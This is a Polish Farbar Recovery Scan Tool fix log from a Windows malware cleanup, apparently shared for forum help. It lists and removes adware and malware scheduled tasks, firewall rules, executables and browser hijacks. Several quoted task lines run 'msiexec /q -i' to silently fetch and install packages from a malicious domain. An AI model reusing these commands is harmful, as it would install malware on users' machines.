Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 20.06.2018 Uruchomiony przez Ryuuku (23-09-2018 13:20:25) Run:1 Uruchomiony z D:\Ryuuku\Downloads Załadowane profile: Ryuuku (Dostępne profile: Ryuuku) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** Task: {031C5E90-2DC1-47A9-B18A-BA62A50B5D1B} - System32\Tasks\{84BA2884-E7CC-76DF-A609-4099971479D6} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.iul Task: {031E08D8-BBB6-45D7-8E79-EE276F67F075} - System32\Tasks\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.ieo Task: {636AD5F0-226D-497A-AC4F-779BC299C81E} - System32\Tasks\{64D37BF8-BBEA-A456-51C9-A118801C0D0E} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt Task: {7479A460-5893-42C3-95D1-A4803628BA6C} - System32\Tasks\{605AE53A-C188-3376-5E0D-68183401157D} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt Task: {978D2965-E1DF-4723-B56F-2914D3658228} - System32\Tasks\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=lx6bs30puezteu1uy7b32g0vgs8thjot&prid=1&pid=4_1324_0 Task: {F937031D-C751-4AEA-9ECA-5238451313C4} - System32\Tasks\{159EF659-4241-B5C4-8CF9-46DF34FA3D62} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=g6p9m608jw5e8plsv5eho4mf4k3ufmql&prid=1&pid=4_1324_0 FirewallRules: [{A2AB0068-96F5-4E9E-B6BF-69E7EEA41084}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{85D688A7-D708-407C-BC57-CF3CEC0440E0}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe FirewallRules: [{3F976A86-0171-436F-9DE2-5ACC1B217144}] => (Allow) C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe FirewallRules: [{58B801B8-14EF-4366-9F67-B6A21A53BEB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{F40DD2A8-508F-46D4-AD25-605339207A84}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{EF5040F2-911D-413D-96D4-F2966DE5B32D}] => (Allow) C:\Program Files (x86)\CseOVOAOo.exe FirewallRules: [{8E0A82BB-0383-4642-A126-3D0C18C464D4}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe FirewallRules: [{542EEA5B-B888-4282-B07F-0D1C4DD50B47}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1D9F26D1-2CB4-4BE1-9788-20540CABB336}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{B1CFE105-C6DE-4F0C-A1A5-A03483977BC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D685430B-3DE0-4E4A-8204-3820B9E6B077}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{31612011-A91C-4D31-B04C-E23DD2C4F7AC}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{9E76281B-5526-4A25-8ED8-AE3A534EC8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{E41056A0-A47B-411A-A371-F9F220D3F058}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{25AFC395-C9D7-40BC-A156-BF5DF738080C}] => (Allow) C:\Windows\SysWOW64\svchost.exe C:\Program Files (x86)\CseOVOAOo.exe C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe C:\Users\Ryuuku\AppData\Local\yGOYOHOXbaAnc.exe CHR DefaultSearchURL: Default -> data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA2lJREFUeNqMVk1vGkEMndmu4MLmkOWQoCqkh0APqAdUVNpKiXLux/+tFKlSDlEitcm15RI4BBBiucCFjdDUs571eL1L1EEC450d28/P9ujvH7+qbBljFFtaa9SgAN9ij9Xnb/LNdBrKIUn0rNKGKi1vvkpPQqi0syYiIBvlN7lt2kM7C6ErE2gr6BfcpCXO4mg4AURlCg6ZHCIrGuk1Kckp/q20P13u1NknW4E7VMkAreE8ONTLEA0Lpep0jDvgSReZIGRQbkSNuBnT0+ggOowP0X3uB0cC1qvu6453Te8lT3/Qv7i8SLfpbDrDN4efh4MPg91ut1gsMBprqYSEY1EledA1fNo+bcN3kiS0HzVgz7pMwGrJhRBs5glS+EuVQbkDZKIoAmHyOEEP2m/s6WmaJsnKRZ5XoijJkIrAWtKG8sP5dNw6ds46Puhmswni+HFsmclKnZe9M0BmiXD4uFavdbod3ERC713PRZDhA2GhJlkmmBuOj0vkt+EXbhl5BnY6bzvDT0P1f+v25nb0Z8SZ6rikMwO51gcGf8G7xkEDNtRqtfPLc1Be/7zebreYkv77PghXP65g5ypZWT3RP3ufjIWeOb6A7LPNZrNerymfIE/GE4wSKgAZNX2aenIrhwF5jzZCOpg3Ly4jf1bIlozsWF+zpxmxQ+liN81UWBaBMrIjOhpoZwkpBGl0hW0U1vNmvXGFooycHMbHFJY7OO4jwqAB6BOkieMYM9GrW818Oge4CuzUDCIqcW4GDsU00iKm0jrrnqFw/+t+uVxyHhZA9jRlZuAvOg5wgyXI8N3NHb55cnoCxgCxh98P6A1gBR/uIkc7LGQ4xx0WFA4lAEAAwuA76Ph85jR82ogJmje7whD37RBfOGodYYaJ4GgSMKFZW25BHiiVzwMaOx47KLF6DfPpupAxkFioO99Eiye6GhYRFEZYcdi2Wi0sMYCYJwYCek6fOdC+GRt5zQmlC8wSdGNgiG3RxlX46O8ITfojlBHDkuLwzU7cscr1LLqhd5y3hfK8Iogq7lLZ8jZK9zU+9co3KK4P+LnCca9nG8T9RedLXBL8tUUMIGwvojXtc99dthiqLnoWViADNHvvAGL2uROVFtcykZjwhZdFcAJc6TjbwTEM3QAq3lP40VSThRxU3U0rgf0nwADpJQebhAz3/AAAAABJRU5ErkJggg== CHR HKLM-x32\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx C:\Users\Ryuuku\AppData\Local\imw.ini EmptyTemp: ***************** "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{031C5E90-2DC1-47A9-B18A-BA62A50B5D1B}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{031C5E90-2DC1-47A9-B18A-BA62A50B5D1B}" => pomyślnie usunięto C:\Windows\System32\Tasks\{84BA2884-E7CC-76DF-A609-4099971479D6} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{84BA2884-E7CC-76DF-A609-4099971479D6}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{031E08D8-BBB6-45D7-8E79-EE276F67F075}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{031E08D8-BBB6-45D7-8E79-EE276F67F075}" => pomyślnie usunięto C:\Windows\System32\Tasks\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{636AD5F0-226D-497A-AC4F-779BC299C81E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{636AD5F0-226D-497A-AC4F-779BC299C81E}" => pomyślnie usunięto C:\Windows\System32\Tasks\{64D37BF8-BBEA-A456-51C9-A118801C0D0E} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{64D37BF8-BBEA-A456-51C9-A118801C0D0E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7479A460-5893-42C3-95D1-A4803628BA6C}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7479A460-5893-42C3-95D1-A4803628BA6C}" => pomyślnie usunięto C:\Windows\System32\Tasks\{605AE53A-C188-3376-5E0D-68183401157D} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{605AE53A-C188-3376-5E0D-68183401157D}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{978D2965-E1DF-4723-B56F-2914D3658228}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{978D2965-E1DF-4723-B56F-2914D3658228}" => pomyślnie usunięto C:\Windows\System32\Tasks\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F937031D-C751-4AEA-9ECA-5238451313C4}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F937031D-C751-4AEA-9ECA-5238451313C4}" => pomyślnie usunięto C:\Windows\System32\Tasks\{159EF659-4241-B5C4-8CF9-46DF34FA3D62} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{159EF659-4241-B5C4-8CF9-46DF34FA3D62}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A2AB0068-96F5-4E9E-B6BF-69E7EEA41084}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{85D688A7-D708-407C-BC57-CF3CEC0440E0}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F976A86-0171-436F-9DE2-5ACC1B217144}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{58B801B8-14EF-4366-9F67-B6A21A53BEB3}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F40DD2A8-508F-46D4-AD25-605339207A84}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EF5040F2-911D-413D-96D4-F2966DE5B32D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8E0A82BB-0383-4642-A126-3D0C18C464D4}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{542EEA5B-B888-4282-B07F-0D1C4DD50B47}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1D9F26D1-2CB4-4BE1-9788-20540CABB336}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B1CFE105-C6DE-4F0C-A1A5-A03483977BC9}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D685430B-3DE0-4E4A-8204-3820B9E6B077}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{31612011-A91C-4D31-B04C-E23DD2C4F7AC}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9E76281B-5526-4A25-8ED8-AE3A534EC8AB}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E41056A0-A47B-411A-A371-F9F220D3F058}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{25AFC395-C9D7-40BC-A156-BF5DF738080C}" => pomyślnie usunięto C:\Program Files (x86)\CseOVOAOo.exe => pomyślnie przeniesiono C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe => pomyślnie przeniesiono C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe => pomyślnie przeniesiono C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe => pomyślnie przeniesiono C:\Users\Ryuuku\AppData\Local\yGOYOHOXbaAnc.exe => pomyślnie przeniesiono "Chrome DefaultSearchURL" => pomyślnie usunięto "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nladljmabboanhihfkjacnnkgjhnokhj" => pomyślnie usunięto C:\Users\Ryuuku\AppData\Local\imw.ini => pomyślnie przeniesiono =========== EmptyTemp: ========== BITS transfer queue => 6578176 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36303008 B Java, Flash, Steam htmlcache => 54733716 B Windows/system/drivers => 2600994 B Edge => 108442926 B Chrome => 766274589 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 0 B systemprofile32 => 0 B LocalService => 5022 B NetworkService => 1426 B Ryuuku => 140902616 B RecycleBin => 38316 B EmptyTemp: => 1 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 13:20:33 ====